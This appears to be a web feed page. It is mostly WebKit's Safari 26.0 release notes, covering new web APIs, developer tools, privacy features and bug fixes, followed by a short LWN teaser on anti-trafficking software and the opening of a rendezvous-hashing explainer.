Web developers can use the Trusted Types API, now in Safari 26.0, to ensure that end user input does not lead to client-side cross-site scripting (XSS). The API guarantees that input can be sanitized using a developer-specified function before being passed to vulnerable APIs.
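A minimal sketch, assuming an escapeHTML sanitizer you supply yourself:

// Register a policy whose createHTML hook runs before HTML sinks accept input.
const policy = trustedTypes.createPolicy('sanitizer', {
    createHTML: (input) => escapeHTML(input), // escapeHTML is your own function
});
// innerHTML now receives a TrustedHTML value rather than a raw string.
element.innerHTML = policy.createHTML(untrustedInput);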
We’ve added support for the URL Pattern Standard, which provides an efficient and performant way for web developers to match URLs using regular expressions through the URLPattern object. For instance, if your blog posts follow the pattern of /blog/title-of-the-post you could match them as follows:
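A sketch of that match (the URL is illustrative):

const pattern = new URLPattern({ pathname: '/blog/:title' });
pattern.test('https://example.com/blog/title-of-the-post'); // true
const result = pattern.exec('https://example.com/blog/title-of-the-post');
console.log(result.pathname.groups.title); // "title-of-the-post"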
Coming to Safari 26.0 is the WebAuthn Signal API, which allows websites to report credential updates (like username changes or revocations) to credential providers, ensuring a more accurate and consistent user experience with passkeys. The new PublicKeyCredential.signal methods enable websites to communicate these changes, improving credential management and streamlining sign-in flows. This enhancement empowers websites to provide a more seamless and secure WebAuthn experience.
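For example, a sketch of reporting a credential that the server no longer recognizes (the IDs are illustrative):

// After a failed assertion, tell the credential provider this ID is unknown.
await PublicKeyCredential.signalUnknownCredential({
    rpId: 'example.com',
    credentialId: 'vI0qOggiE3OT01ZRWBYz5w', // base64url-encoded credential ID
});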
There’s also now support for the File System WritableStream API, enabling direct writing to files within the user’s file system. This API provides an efficient and streamlined way to save data, allowing developers to build applications with enhanced file handling capabilities, such as direct downloads and in-place file editing.
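A sketch of writing to a file in the origin-private file system (the file name is illustrative):

const root = await navigator.storage.getDirectory();
const handle = await root.getFileHandle('notes.txt', { create: true });
const writable = await handle.createWritable(); // a FileSystemWritableFileStream
await writable.write('Hello, file system!');
await writable.close(); // changes are committed on close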
WebKit for Safari 26.0 adds support for the alg parameter when importing or exporting Edwards-curve based JSON Web Keys in WebCrypto.
Support for scrollMargin in IntersectionObserver is here for more precise intersection detection. This allows you to define margins around the root element, similar to rootMargin, providing finer control over when intersection events are triggered.
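A sketch of the new option (the selector and callback are illustrative):

const observer = new IntersectionObserver(onIntersect, { // onIntersect is your own callback
    scrollMargin: '200px', // expand clip rects of nested scroll containers by 200px
});
observer.observe(document.querySelector('.item'));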
New since Safari 26 beta 1, the <dialog> element now supports the toggle event, which can be used to watch for whenever the dialog gets opened or closed. Safari 26.0 also now supports the Scoped Custom Element Registry.
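A small sketch of the toggle event:

const dialog = document.querySelector('dialog');
dialog.addEventListener('toggle', (event) => {
    console.log(event.oldState, '->', event.newState); // e.g. "closed" -> "open"
});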
WebKit for Safari 26.0 also removed the getSVGDocument() method from HTMLFrameElement to align with the most recent specification.
JavaScript
WebKit for Safari 26.0 adds support for Pattern Modifiers in JavaScript’s RegExp objects. Pattern modifiers allow more fine-grained control over the behavior of regular expressions through adding and removing flags within a regular expression.
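For example, a sketch that applies the i flag to only part of a pattern:

// Case-insensitive matching applies only inside the (?i: ... ) group.
const re = /^(?i:hello) world$/;
re.test('HeLLo world'); // true
re.test('hello WORLD'); // false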
New since WWDC25, WebKit for Safari 26.0 adds support for the notation option for Intl.PluralRules and the Intl.Locale.prototype.variants getter.
SVG icons
Safari 26.0 now supports the SVG file format for icons everyplace there are icons in the interface, including favicons.
For years, favicons were just displayed in the browser window’s URL bar, or in a menu of favorites. Now, icons show up in a range of places across browsers, at wildly different sizes. That includes the Safari start page, where icons represent content in Reading List, iCloud Tabs, Suggestions and Favorites. For web apps, this same icon represents the website on the user’s Home Screen or in their Dock. And icons are, of course, used in Safari tabs and menus.
By using an SVG file for your icon, you leverage infinite vector scaling. You rely on Safari to do the work of creating rasterized icons at multiple sizes to be used in various locations. And an SVG file is also often a smaller download than the .png files commonly used for favicons.
Data URL images are now supported for icons as well, allowing you to express small image files as code.
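Declaring an SVG icon is one line (the path is illustrative):

<link rel="icon" href="/app-icon.svg" type="image/svg+xml">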
WebGPU
WebKit for Safari 26.0 adds support for WebGPU.
WebGPU, a JavaScript API for running programs on the GPU, is similar to WebGL in its capabilities for graphics and rendering. Additionally, it adds compute shaders, which allow general purpose computations on the GPU, something not previously possible with WebGL.
WebGPU supersedes WebGL on macOS, iOS, iPadOS, and visionOS and is preferred for new sites and web apps. It maps better to Metal, and the underlying hardware. Comparatively, WebGL required significant translation overhead due to being derived from OpenGL, which was designed prior to modern GPUs.
GPU programs are provided by the website or web app using the WebGPU Shading Language, known as WGSL (pronounced wig-sill). It’s a new language that is verifiably safe for the web, unlike some existing shading languages which allow for unchecked bounds accesses and pointer arithmetic.
WebGPU has been enabled in Safari Technology Preview for over a year, and is now shipping in Safari 26.0 for macOS, iOS, iPadOS, and visionOS. Given the level of hardware access provided by WebGPU, much consideration was taken to ensure WebGPU does not expose new security attack surfaces. Additionally, validation performed was streamlined recently to minimize overhead and maintain closer to native application performance.
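A minimal sketch of getting started, inside an async function and without error handling:

// Request an adapter and device, then configure a <canvas> for WebGPU.
const adapter = await navigator.gpu.requestAdapter();
const device = await adapter.requestDevice();
const context = document.querySelector('canvas').getContext('webgpu');
context.configure({
    device,
    format: navigator.gpu.getPreferredCanvasFormat(),
});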
Safari 26.0 expands support for the WebCodecs API by adding AudioEncoder and AudioDecoder. WebCodecs gives developers low-level access to the individual frames of a video stream and chunks of audio. These additions make it possible to encode AudioData objects and decode EncodedAudioChunk objects.
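A sketch of configuring an encoder (the codec settings are illustrative):

const encoder = new AudioEncoder({
    output: (chunk, metadata) => handleChunk(chunk), // handleChunk is your own function
    error: (e) => console.error(e),
});
encoder.configure({
    codec: 'opus',
    sampleRate: 48000,
    numberOfChannels: 2,
});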
Safari 26.0 now includes several improvements for the Media Source API (MSE). It adds support for detachable MediaSource objects to allow for seamless switching between objects attached to a media element. And MediaSource now prefers DecompressionSession.
And new since Safari 26 beta 1, WebKit now supports in-band tracks in MSE.
WebRTC
WebKit brings multiple updates for WebRTC, adding support for:
Exposing CSRC information for RTCEncodedVideoStream
Speaker Selection API on iOS and iPadOS
Serialization of RTCEncodedAudioFrame and RTCEncodedVideoFrame
ImageCapture.grabFrame
RTCRtpScriptTransformer.generateKeyFrame to take a rid parameter
RTCEncodedAudioFrame and RTCEncodedVideoFrame constructors
New since WWDC25, WebKit for Safari 26.0 now supports exposing a default system speaker device.
And Safari 26.0 removed the fec and rtx from WebRTC encoding parameters.
Editing
To further support users as they edit content on the web, Safari 26.0 adds support for rendering the native selection UI inside scrolled content.
HTTP
Also new since our announcements at WWDC25, Safari 26.0 now adds support for WebSocket over HTTP/2 and HTTP/3.
SVG
For SVG group containers, Safari 26.0 adds support for pointer-events="bounding-box".
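A sketch: make the group’s entire bounding box hit-testable, including the space between shapes:

<g pointer-events="bounding-box">
    <circle cx="20" cy="20" r="10" />
    <circle cx="80" cy="20" r="10" />
</g>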
Website compatibility
Report a website issue
Now in Safari on macOS, iOS, and iPadOS, users can report an issue anytime they are having trouble with a webpage.
If you run into trouble you don’t expect, first try reloading the page. If there’s still a problem, go to the Page menu, where you’ll find “Report a Website issue…” This brings up a quick set of multiple choice questions that provide the key information for us to spot patterns and better ensure a great experience in Safari.
Update to UA String
Also, now in Safari on iOS, iPadOS, and visionOS 26 the user agent string no longer lists the current version of the operating system. Safari 18.6 on iOS has a UA string of:
Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1
And Safari 26.0 on iOS has a UA string of:
Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Mobile/15E148 Safari/604.1
This matches the long-standing behavior on macOS, where the user agent string for Safari 26.0 is:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15
It was back in 2017 when Safari on Mac first started freezing the Mac OS string. Now the behavior on iOS, iPadOS, and visionOS does the same in order to minimize compatibility issues. The WebKit and Safari version number portions of the string will continue to change with each release.
Web Inspector
To inspect a Service Worker you need to open a Web Inspector from Safari’s Develop menu. That’s because the execution context of a Service Worker is independent of the page that installed it. But the action handled by a Service Worker might have already occurred by the time you get to it via the Develop menu. This can happen, for example, with Web Push events where the Service Worker has already handled the incoming push.
To address this, Safari 26.0 introduces automatic inspection and pausing of Service Workers. This is similar to the existing feature for automatic inspection and pausing of JSContexts. To use it, open the Inspect Apps and Devices tool from the Develop menu. Identify the app or Home Screen Web App that uses a Service Worker you want to inspect and, from the three-dots menu, select the option labeled Automatically Inspect New Service Workers. The next time a Service Worker runs in that app, a Web Inspector window will open automatically for it. Use the Automatically Pause New Service Workers option to also pause JavaScript execution in the Service Worker as soon as it’s inspected. This allows you to set breakpoints and step through the code as actions are handled.
Recording Workers in the Timelines tab
Safari 26.0 makes it easier to debug Worker-related memory and performance issues using the Timelines tab in Web Inspector. Breakpoints, profiling data, events, call trees, and heap snapshots are now correctly attributed to each Worker and not its associated page. JavaScript code that runs in a Worker may also call debugger, console.profile, etc. to supplement timeline data with application-specific milestones. Lastly, it is now possible to export and import data gathered from Workers in a Timeline recording.
Slotted badge
The Elements node tree in Web Inspector now shows a badge labeled Slotted next to nodes that have been inserted into corresponding <slot> nodes within Custom Elements. Click the badge to expand the node tree into the Shadow DOM of the Custom Element and jump to the <slot> node. If there is a correspondence, the <slot> node has a badge labeled Assigned next to it. Click this badge to jump to the node from the light DOM that is slotted here.
Improved async debugging experience
The Web Inspector debugger has been updated to provide a more intuitive debugging experience for asynchronous code. You can now step over an await statement as if it were synchronous, meaning the debugger will skip the underlying asynchronous mechanics and move to the next line of code in the function. This simplifies debugging because it allows you to focus on the intended logic of your code, rather than the potentially confusing execution path introduced by await.
New in Web Inspector since Safari 26 beta 1
Web Inspector adds support for two newer CSS features — @starting-style and @scope styles (in the Styles sidebar).
Safari 26.0 adds support for the console to log both the URI and the time when entering a new navigation context. And it adds support for console.profile in Worker.
Web Inspector now supports exporting and importing data from worker targets in the Timelines tab.
WebKit in SwiftUI
WebKit has a brand-new API designed from the ground up to work with Swift and SwiftUI. This makes it easier than ever to integrate web content into apps built for Apple platforms.
The core parts of this new API are the new WebView and WebPage types.
WebView
To display your web content, simply use the new WebView type, a brand-new native SwiftUI View. All you need to do is give it a URL to display.
WebView also supports a powerful set of new and existing view modifiers, like webViewScrollPosition, webViewMagnificationGestures, findNavigator, and more. For more advanced customization, like being able to react to changes in the content, you’ll need to connect it to a WebPage.
WebPage
WebPage is a brand new Observable class that can be used to load, control, and communicate with web content. You can even use it completely on its own, in cases where you don’t need to display the page directly to your users. But when you do, combining it with WebView allows you to build rich experiences, and integrate the web into your app with ease. WebPage has a full set of observable properties and functions you can use to make reacting to changes incredibly simple, especially with SwiftUI.
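As a minimal sketch (assuming the WebView(_:) initializer and WebPage.load(_:) method shown here), combining the two might look like:

import SwiftUI
import WebKit

struct BrowserView: View {
    // WebPage is Observable, so SwiftUI tracks its changes.
    @State private var page = WebPage()

    var body: some View {
        WebView(page)
            .task {
                // Kick off a load; the view updates as the page navigates.
                page.load(URLRequest(url: URL(string: "https://webkit.org")!))
            }
    }
}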
The new URLSchemeHandler protocol makes it super easy to implement handling custom schemes so that local resources and files can be used in your app. It leverages the full capabilities of Swift and Swift Concurrency, and you just need to provide it with an AsyncSequence.
WebPage.NavigationDeciding is a new protocol that lets you customize how navigation policies should behave in your app across different stages of a navigation. In addition to WebPage.NavigationDeciding, there’s also WebPage.DialogPresenting to customize how dialogs presented from JS should be displayed.
We look forward to seeing what Apple Developers do with the new WebPage and WebView types for Swift and SwiftUI. As a web developer, it’s now easier than ever for you to use the skills you have to create an app for iOS, iPadOS, macOS, and visionOS.
Several improvements to WebKit API are available now in iOS, iPadOS, macOS, and visionOS beta.
Screen Time support
Local storage and session storage restoration APIs for WKWebView
The ability to apply backdrop-filter to content behind a transparent webview
A new obscuredContentInsets property added to WKWebView allows developers to specify areas of the web view that are covered by browser UI elements like tab bars or toolbars. Set this property to automatically adjust the layout viewport so web content renders within the visible area without being obscured by overlapping interface elements.
WebKit also deprecated WKProcessPool and WKSelectionGranularity.
Web Extensions
The new web-based Safari Web Extension Packager allows developers to take their existing web extension resources and prepare them for testing in Safari through TestFlight and distribution through the App Store. The tool is available in App Store Connect and uses Xcode Cloud to package the extension resources you provide into a signed app + extension bundle that can be used in Safari on macOS, iOS, iPadOS, and visionOS. Learn more about using the tool in our documentation on developer.apple.com.
Web Extension commands are now shown in the menu bar on macOS and iPadOS. On macOS, users can customize the keyboard shortcut associated with a command in Safari Settings.
Web Extensions can now be loaded in SafariDriver. This feature allows developers to test their extension in an automated setting. Using Selenium, you can register custom commands to utilize this new feature. Learn more about these commands in the documentation on the WebExtensions Community Group GitHub.
New since WWDC25, Safari 26.0 adds Web Extensions support for dom.openOrClosedShadowRoot().
Content Blockers
Content blockers are a kind of extension that gives Safari a set of rules to use to block content in the browser window. Blocking behaviors include hiding elements, blocking loads, and stripping cookies from Safari requests.
Safari 26.0 includes three new features for content blockers:
unless-frame-url
the request-method content blocker trigger field
isContentRuleListRedirect
WebAssembly
As WebAssembly continues to grow in popularity, WebKit has been improving WebAssembly performance across the board. Now, WebAssembly is first evaluated by our new in-place interpreter. This allows large WebAssembly modules to launch even faster and use less memory, while retaining the same top end throughput after warming up.
Networking
WebKit now supports <link rel=dns-prefetch> on iOS, iPadOS, and visionOS. It gives a hint to the browser to perform a DNS lookup in the background to improve performance. Supported on macOS since Safari 5, it now has improved privacy.
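A one-line sketch (the host is illustrative):

<link rel="dns-prefetch" href="https://cdn.example.com">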
Privacy
In our continuing efforts to improve privacy and protect users, Safari 26.0 now prevents known fingerprinting scripts from reliably accessing web APIs that may reveal device characteristics, such as screen dimensions, hardware concurrency, the list of voices available through the SpeechSynthesis API, Apple Pay payment capabilities, web audio readback, 2D canvas, and more. Safari additionally prevents these scripts from setting long-lived script-written storage such as cookies or LocalStorage. And lastly, Safari prevents known fingerprinting scripts from reading state that could be used for navigational tracking, such as query parameters and document.referrer.
Lockdown Mode
Available on iOS, iPadOS, watchOS, and macOS, Lockdown Mode is an optional, extreme protection that’s designed for the very few individuals who, because of who they are or what they do, might be personally targeted by some of the most sophisticated digital threats. This includes limiting some of what websites can do to ensure the highest level of protection.
Since its beginning, Lockdown Mode disallowed the use of most web fonts. Now instead, web fonts are evaluated by the new Safe Font Parser, and if they pass the evaluation, they are allowed. This means almost all content will be displayed using the specified web fonts in Lockdown Mode.
Device management
Device management lets an administrator securely and remotely configure devices. It’s often used when a fleet of devices is used by a lot of people at work or school, and the administrator responsible for those devices needs tooling for more easily taking care of them all.
Safari 26.0 adds two new features to further support device management. Now a managed device can have a folder of managed bookmarks. And a managed device can have a managed new tab or new window page (home page, blank page, extension new tab page).
Security
Security improvements in Safari 26.0 include adding support for enforcing the Integrity-Policy header on script destinations. And adding a new configuration to support Google Safe Browsing version 5 traffic to Safari and WebKit clients with the web browser entitlement.
Bug fixes and more
Along with all of these new features, WebKit for Safari 26.0 includes a plethora of fixes to existing features.
Accessibility
Fixed aria-expanded attribute support on navigation links. (141163086)
Fixed presentational images with empty alt attributes to be ignored by assistive technology, even when additional labeling attributes are set. (146429365)
Fixed <figcaption> within a <figure> element to only contribute to the accessible name of an <img> element if the image lacks other labeling methods like alt, ARIA attributes, or the title attribute. (150597445)
Fixed handling of invalid values for aria-setsize and aria-posinset according to the most-recent revision of the ARIA specification. (151113693)
Fixed VoiceOver reading “Processing page %infinity” when loading large pages. (152617082)
Fixed VoiceOver failing to output newlines in certain circumstances when using caret navigation. (154368379)
Fixed an issue where dynamic changes to iframe display properties could cause the iframe’s scroll view to incorrectly become the accessibility root, preventing assistive technologies from accessing content outside the iframe. (156440342)
Fixed CSS content alt text when used on an element to be announced by VoiceOver. (156666741)
Browser
Fixed keyboard typing to cancel voice dictation. (152597958)
Fixed: Safari now reports a frozen OS version in its user agent string on iOS 26 and iPadOS 26, showing the last version released before iOS 26. (156170132)
CSS
Fixed cursor: pointer not appearing on an <area> element used in conjunction with an <img usemap="..."> element. (74483873)
Fixed: Apply space from align-content when grid container and rows have definite sizes during column sizing. (85252183)
Fixed <frame> and <frameset> to always be in-flow and non-floating. (102670652)
Fixed incorrect grid sizing with inline-size containment and auto-fit columns. (108897961)
Fixed “inherit” as a variable substitution fallback when setting a custom property. (136463977)
Fixed content skipped with content-visibility: auto to be findable. (141237620)
Fixed an issue wrapping an SVG at the end of a line when using text-wrap: balance. (141532036)
Fixed @font-face font-family descriptor to not allow a list of values. (142009630)
Fixed the computed value of a float with absolute positioning to be none when there is no box. (144045558)
Fixed buttons to not have align-items: flex-start by default. (146615626)
Fixed style container query on :host CSS pseudo-class to be correctly applied to slotted elements. (147684247)
Fixed @scope to create a style rule with a nested context. (148101373)
Fixed changing content-visibility from visible to hidden to repaint correctly. (148273903)
Fixed an issue where float boxes, selections, and carets were incorrectly painted inside skipped subtrees. (148741142)
Fixed incorrect getBoundingClientRect() inside a skipped subtree on an out-of-flow positioned box. (148770252)
Fixed making <pre> and other elements use logical margins in the User-Agent stylesheet. (149212392)
Fixed space-around and space-evenly to fall back to safe center for align-content. (153403381)
Fixed the serialization of <color> custom properties to provide the used value. (153675017)
Canvas
Fixed re-drawing a canvas with relative width when the parent element is resized. (121996660)
Fixed getContext('2d', { colorSpace: 'display-p3' }) in iOS Simulator. (151188818)
DOM
Fixed the serialization of CDATASection nodes in HTML. (150739105)
Editing
Fixed the selection UI to be clipped in overflow scrolling containers. (9906345)
Fixed selection issues caused by <br> elements between absolute positioned elements. (123637358)
Fixed selection failing to update during auto or keyboard scrolling. (144581646)
Forms
Fixed form-associated ElementInternals always reporting a customError when using setValidity. (115681066)
Fixed setValidity of ElementInternals to handle a missing optional anchor parameter. (123744294)
Fixed updating scrollbar appearance correctly for the page and <textarea> elements. (151496190)
Fixed programmatically assigned File objects to display the correct filename in <input> elements, even without a file path. (152048377)
Fixed labels inside <select> elements to behave consistently with other browsers by using standard attribute matching instead of quirk mode handling. (152151133)
Fixed allowing the custom element itself to be passed as a validation anchor in the setValidity() API. (154303420)
Fixed the intrinsic size of number inputs when the spin button width is a percentage value. (154680747)
Images
Fixed zoomed <img> to not cause unwanted rounding of width and height. (150473104)
JavaScript
Fixed Array.prototype.pop to throw an exception when the array is frozen. (141805240)
Fixed performance of Math.hypot() that was significantly slower than Math.sqrt(). (141821484)
Fixed RegExp#[Symbol.search] to throw TypeError when lastIndex isn’t writable. (146488846)
Fixed Array#indexOf and Array#includes to treat +0 and -0 as the same value. (148472519)
Fixed iterator helpers incorrectly closing iterators on early errors. (148774612)
Fixed Iterator.prototype.reduce failing with an undefined initial parameter. (149470140)
Fixed: Aligned f() = 1 behavior with other engines when not using strict mode. (149831750)
Fixed nested negated classes resulting in incorrect matches. (151000852)
Fixed DateTime string parsing for ISO8601 inputs. (153679940)
Fixed toIntegerOrInfinity to truncate negative fractional values to +0.0. (153939418)
Fixed the order of function’s special properties returned by Object.keys and Object.entries. (155607661)
Media
Fixed picture-in-picture to exit when the video element is removed. (123869436)
Fixed MP4 seeking with b-frames to prevent out-of-order frame display by suppressing frames with earlier presentation timestamps following the seek point. (140415210)
Fixed media elements on iPadOS to support the volume being changed by web developers, similar to macOS and visionOS. The :volume-locked pseudo-class can continue to be used for feature detection. (141555604)
Fixed seeking or scrubbing not always seeking to the time requested. (142275903)
Fixed stale audio buffer data after seeking when playing sound through an AudioContext. (146057507)
Fixed subtitle tracks with no srclang to be shown with the correct label. (147722563)
Fixed MediaSession to handle SVG icons with subresources. (150665852)
Fixed MediaCapabilitiesDecodingInfo.configuration to be correctly populated even when .supported is false. (150680756)
Fixed video elements with WebM object URLs causing MediaError code 2. (151234095)
PDF
Fixed “Open with Preview” button to open a PDF in the Preview app. (148680145)
Rendering
Fixed
overflow: hidden
to not clip
filter: drop-shadow()
. (72205047)
Fixed a
list-style-position: inside
list item marker to be rendered as the first child of the list item. (79587134)
Fixed using
setDragImage
with a fixed-position element, so that the drag preview bitmap includes the correct content. (90120656)
Fixed an issue to allow images in scroll containers to load when they are near the viewport rather than when they are intersecting the viewport. (118706766)
Fixed CSS filters to establish a containing block like transform does. (119130847)
Fixed a disappearing stretched image in a vertical flexbox layout. (135897530)
Fixed CSS gradient interpolation for “longer hue” gradients when an end color stop is omitted. (142738948)
Fixed
will-change: view-transition-name
to create a stacking context and a backdrop root. (146281670)
Fixed
will-change: offset-path
to create a stacking context and a containing block. (146292698)
Fixed
<datalist>
dropdowns not displaying option labels. (146921617)
Fixed the text indicator sometimes getting clipped during a bounce animation. (147602900)
Fixed not marking
content-visibility: hidden
content for layout when targeting
content-visibility: auto
. (148663896)
Fixed incorrect
ruby
annotation positioning in
sideways-lr
. (148713073)
Fixed: Prevented hit testing content inside a skipped subtree. (148741508)
Fixed an issue where
feMerge
incorrectly positioned HTML elements when merging the same
feMergeNode
multiple times. (149431216)
Fixed
box-shadow
with spread on a border-radius box to scale the radii correctly. (149490613)
Fixed an issue in determining when a flex item should be used for percentage resolution during intrinsic width computation. (149615295)
Fixed an issue causing a
<canvas>
element to disappear for one frame if a view transition occurs. (149709642)
Fixed
<div contenteditable>
within an
<iframe>
not scrolling into the viewport on receiving focus for the second time. (150521759)
Fixed invisible
<audio>
controls when transformed due to incorrect coordinate space calculations for clipped child elements. (150526971)
Fixed centering text for
<input type=button>
elements with
display: flex
. (151148821)
Fixed showing a resize cursor even when text overlaps the resize control. (151309503)
Fixed SVG transform
translate(X)
not equal to
translate(X,0)
. (151643419)
Fixed
border-image
repaint code that was broken in some writing modes. (152396671)
Fixed rendering an image with a
filter
and
mix-blend-mode
only getting filtered but not mixed. (152460888)
Fixed
box-shadow
to repaint correctly in
vertical-rl
and
horizontal-bt
writing modes. (152803240)
Fixed
border
to no longer be adjusted in computed style for elements with native appearance. (153152167)
Fixed
margin-trim
to not trim inline margins on block-level boxes, regardless of their position. (153240895)
Fixed
text-wrap-style
to not constrain single line content. (153755326)
Fixed inputs within
inline-block
containers shifting vertically when text is deleted and re-entered into an input. (154094432)
Fixed baseline alignment participation to expand to items with automatic logical width in the alignment axis. (154311395)
Fixed grid containers incorrectly processing first-letter pseudo-elements when they should not contribute a first formatted line according to the CSS Grid specification. (154504582)
Fixed grid items hit-testing order to align with painting order. (154990290)
SVG
Fixed SVG paint server fallback handling for a non-existent URL. (144493507)
Fixed respecting the CSS
image-rendering
property when drawing an SVG. (144507619)
Fixed ancestor bounding box for “disabled”
<foreignObject>
and
<image>
. (147455573)
Fixed: Improved handling of SVG images with subresources. (148607855)
Fixed handling of
auto
for
rx
and
ry
on
<ellipse>
. (153274593)
Safari View Controller
Fixed
lvh
and
vh
viewport units getting incorrectly sized relative to the small viewport in SFSafariViewController. (108380836)
Scrolling
Fixed selection not updating during autoscroll when selecting with a gesture or a mouse. (144744443)
Fixed autoscrolling for smooth scrolling while selecting text. (144900491)
Fixed inconsistent decimal values from
getBoundingClientRect
for sticky elements. (147163986)
Fixed scroll compensation transform to be applied before any other transforms. (155992464)
Service Workers
Fixed the ReadableStream cancel method not getting reliably called in Service Worker. (144297119)
Fixed an issue where navigation preload responses incorrectly retained a redirection flag when served from disk cache, causing security check failures during loading. (144571433)
Fixed
structuredClone
to preserve
Error.cause
. (152725880)
Spatial Web
Fixed various issues related to spatial audio not working in visionOS that could occur when repositioning Safari windows or moving a tab to a new window. (145661522)
Fixed the shape of gaze glow regions for elements with associated labels when the element has non-uniform border radii or if the element is styled with
clip-path
. (154258426)
Text
Fixed generating text fragments around text that contains newlines. (137109344)
Fixed generating text fragments when the selected text starts and ends in different blocks. (137761701)
Fixed bold synthesis to be less aggressive. (138047199)
Fixed Copy Link with Highlight not working when selecting text that is its own block and when that text exists higher up in the document. (144392379)
Fixed selections that start or end in white space not creating text fragments. (145614181)
Fixed
<b>
and
<strong>
to use
font-weight: bolder
to match the Web Specification. (146458131)
Fixed Korean counter styles to be aligned with manual Korean numbering in lists. (152969810)
Fixed content spacing for elements with
text-align: justify
and
white-space: pre-wrap
applied. (154211168)
URLs
Fixed percent-encoding
^
in non-opaque URL paths. (146233526)
Fixed ensuring that opaque URL paths always roundtrip. (146848690)
Fixed making URL host and hostname setters handle
@
correctly. (146886347)
Fixed Windows drive letter after
file:///
when parsing URLs. (147381130)
Web API
Fixed: URL’s protocol setter should forbid switching non-special to special schemes. (82549495)
Fixed event dispatching to be done by the fullscreen rendering update steps. (103209495)
Fixed the
mousemove
event to be fired when the mouse stays in the document but there is no element. (120551245)
Fixed an overly broad fullscreen exit trigger by restricting it to only text-entry elements gaining focus, preventing non-text input types from causing unexpected fullscreen exits. (136726993)
Fixed
WKDownload.originatingFrame
of downloads originated without a frame. (145328556)
Fixed fullscreen to use a single queue for event dispatching. (145372389)
Fixed the
ProgressEvent
members
loaded
and
total
to use the
double
type as per a recent specification change. (146356214)
Fixed Intrinsic Sizing of SVG embedded via
<embed>
to be invalidated on navigation. (147198632)
Fixed an issue where pending utterances do not receive an error event when speech synthesis is cancelled. (148731039)
Fixed escaping
<
and
>
when serializing HTML attribute values. (150520333)
Fixed making the SpeechRecognition interface available only within a secure context. (151240414)
Fixed the
<option>
element to not trim the label value and correctly handle an empty label. (151309514)
Fixed IntersectionObserver to notify observers asynchronously. (152684301)
Fixed setting
innerHTML
to correctly use a scoped custom element registry associated with the context object. (154333132)
Fixed
attachShadow
throwing type error with a ShadowRoot document-fragment. (154658449)
Web Animations
Fixed CSS scroll-driven animations on pages using
requestAnimationFrame
to animate correctly after navigating away and back to the page. (141528296)
Fixed computing the time offset as needed when applying accelerated actions. (142604875)
Web Apps
Fixed the “Add to Home Screen” flow failing to load webpage data, preventing users from making new Home Screen web apps. (154655565)
Web Extensions
Fixed
tabs.update
to not remove history from the target tab. (134939755)
Fixed including the extension’s icon in the commands menu item and prevented customization using System Settings. (135360504)
Fixed a bug where the
runtime.MessageSender
origin parameter would be lowercased, differing from the result returned from
runtime.getURL
. (140291738)
Fixed high-priority redirects to supersede low-priority blocks for declarativeNetRequest. (145241581)
Fixed
"excludeMatches"
array in
scripting.registerContentScripts()
API getting ignored in Safari web extensions. (145489255)
Fixed a
declarativeNetRequest
bug that prevents redirects to extension resources. (145569361)
Fixed processing of
declarativeNetRequest
rules so that higher numbers are treated as higher priority. (145570245)
Fixed an issue causing
wasm-unsafe-eval
to not get parsed as a valid CSP keyword. (147551225)
Fixed
permissions.getAll()
to return the correct origins if all-URLs and/or host match patterns have been granted. (147872012)
Fixed a non-fatal
webRequest
error for non-persistent background content. (150051544)
Fixed
allowAllRequests
declarativeNetRequest rules so that a higher priority correctly overrides a lower-priority block rule. (152746422)
Fixed CSS
display: none
matching everything still getting applied even after an
ignore-following-rules
action was matched. (152996225)
Fixed calling
scripting.registerContentScripts()
sometimes returning the error: “Error: Invalid call to scripting.registerContentScripts(). Failed to add content script.” (153001967)
Web Inspector
Fixed pretty-printing CSS to avoid adding a space after the universal selector (*) when followed by a pseudo-class or pseudo-element, preventing unintended changes to CSS selector behavior. (71544976)
Fixed to show a separate overview for each target in the Timelines tab. (146356054)
Fixed a performance issue when blackboxing a large number of sourcemaps. (148116377)
Fixed the debugger to step over an
await
statement as though it is synchronous code. (149133320)
Fixed parsing sourcemaps asynchronously so that large sourcemaps do not block rendering. (151269154)
Fixed the Timelines tab to consistently display the target’s hierarchical path for JavaScript and Events to prevent confusion when working with multiple targets. (152357197)
Fixed clicking on the “+” button in the Sources tab sidebar doing nothing when Web Inspector is undocked. (153193833)
Fixed Quick Open dialog to show results when an Inspector Bootstrap script exists. (154947309)
WebKit API
Fixed a crash at launch in iOS Simulator for apps built for older deployment targets that bind to specific WebKit API. (152200884)
WebRTC
Fixed switching from speaker to receiver not working the first time, only on the second attempt. (141685006)
Fixed
enumerateDevices
returning devices as available when permissions are denied. (147313922)
Fixed
enumerateDevices
to not check for device permission. (148094614)
Fixed WebRTC encoded transform to transfer the RTC encoded frame array buffer. (148343876)
Fixed RTC encoded frame timestamps to be persistent. (148580865)
Fixed the
configurationchange
event to fire when a microphone’s audio unit changes its echo cancellation mode, ensuring web pages are notified of such changes to update track settings accordingly. (150770940)
Feedback
We love hearing from you. To share your thoughts, find our web evangelists online: Jen Simmons on
Bluesky
/
Mastodon
, Saron Yitbarek on
BlueSky
, and Jon Davis on
Bluesky
/
Mastodon
. You can follow WebKit
on LinkedIn
. If you run into any issues, we welcome your
feedback
on Safari UI (learn more about
filing Feedback
), or your
WebKit bug report
about web technologies or Web Inspector. If you run into a website that isn’t working as expected, please file a report at
webcompat.com
. Filing issues really does make a difference.
If you are running macOS Sequoia or macOS Sonoma, you can update Safari by itself, without updating macOS. Go to Apple menu > System Settings > General > Software Update and click “More info…” under Updates Available.
To get the latest version of Safari on iPhone, iPad or Apple Vision Pro, go to Settings > General > Software Update, and tap to update.
[$] Fighting human trafficking with self-contained applications
Linux Weekly News
lwn.net
2025-09-15 20:15:06
Brooke Deuson is the developer behind
Trafficking Free Tomorrow, a nonprofit organization that
produces free software to help law enforcement combat human trafficking. She is
a survivor of human trafficking herself.
She spoke at RustConf 2025 about her
mission, and why she chose to write her anti-...
(This subscriber-only item will become freely available on September 25, 2025.)
Rendezvous hashing is an algorithm to solve the distributed hash table problem - a common and general pattern in distributed systems. There are three parts of the problem:
Keys:
unique identifiers for data or workloads
Values:
data or workloads that consume resources
Servers:
entities that manage data or workloads
For example, in a distributed storage system, the
key
might be a filename, the
value
is the file data, and the
servers
are networked data servers that collectively store all of the files. Given a key and a dynamic list of servers, the task is to map keys to servers while preserving:
Load Balancing:
